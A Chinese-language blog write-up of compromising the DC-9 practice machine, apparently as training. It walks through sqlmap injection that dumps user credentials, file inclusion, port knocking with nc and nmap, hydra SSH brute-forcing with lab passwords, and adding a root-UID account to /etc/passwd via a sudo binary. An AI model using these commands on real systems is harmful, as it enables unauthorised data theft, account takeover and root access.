DC-9靶机复现

一、信息收集

1.使用nmap对目标靶机进行扫描

image

发现开放了22(filtered ssh)和80端口

2.访问80端口

image

简单查看了一下网站,发现有搜索功能:

image

二、漏洞攻击

1.sql注入

搜索功能和数据库有交互,可以在此进行sql注入,抓包:

image

在此处抓包保存到文件中,然后利用sqlmap工具进行注入:

sqlmap -r "/root/桌面/1" --batch

image

发现可以注入,然后爆出数据库名:

sqlmap -r "/root/桌面/1" -dbs --batch

image

发现users数据库,查看此库中的表(继续用文件sql爆破失败了,切换成链接又可以了,不知道怎么回事):

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D Staff --tables

image

查看Users表的列:

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D Staff -T Users --columns

image

查看表内的数据:

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D Staff -T Users -C Username,Password --dump

image

使用了md5加密,sqlmap顺便就解码了transorbital1。用密码登录系统:

image

2.目录遍历

查看一下系统,发现在Manage界面有File does not exist:

image

目录文件不存在,也就是可以访问目录文件,做一下文件包含的目录爆破:

image

image

发现存在文件包含漏洞,查看可以利用的信息:

image

3.端口敲门服务

发现了/etc/knockd.conf文件,发现是是端口敲门服务,端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

这里可以用nc或nmap去挨个敲门:

nc 192.168.11.134 7469
nc 192.168.11.134 8475
nc 192.168.11.134 9842
或者
nmap -p 7469 192.168.11.134
nmap -p 8475 192.168.11.134
nmap -p 9842 192.168.11.134
nmap -p 22 192.168.11.134

image

现在可以访问22端口,试一下用爆破,一开始爆不出来,回顾一下发现users数据库中还有一个UserDetails表:

sqlmap -u "http://192.168.11.134/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump

image

4.ssh爆破

使用其中的用户名密码进行ssh爆破:

hydra -L /root/桌面/user -P /root/桌面/pass 192.168.11.134 ssh

image

得到能使用的用户名和密码:

login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee

挨个登录后发现janitor用户下有一个密码文件:

image

将密码收录到之前爆破的密码本中农,再次爆破:

image

发现一个新扫出来的用户,登录进去。

login: fredf password: B4-Tru3-001

三、提权

image

发现 sudo -l 可用,找到一个test文件:

image

发现是python相关的文件,查找文件位置:

image

创建一个账号,密码HSAH加密的:

openssl passwd -1 -salt sain sain

echo 'sain:$1$sain$UUM6YmNGatfHwxAHtRq/a1:0:0:root:/bin/bash'>> /tmp/sain.txt

sudo ./test /tmp/sain.txt /etc/passwd

image

su sain ,切换用户:

image

flag:

image

完成。

posted @ 2021-11-26 16:38  sainet  阅读(185)  评论(0编辑  收藏  举报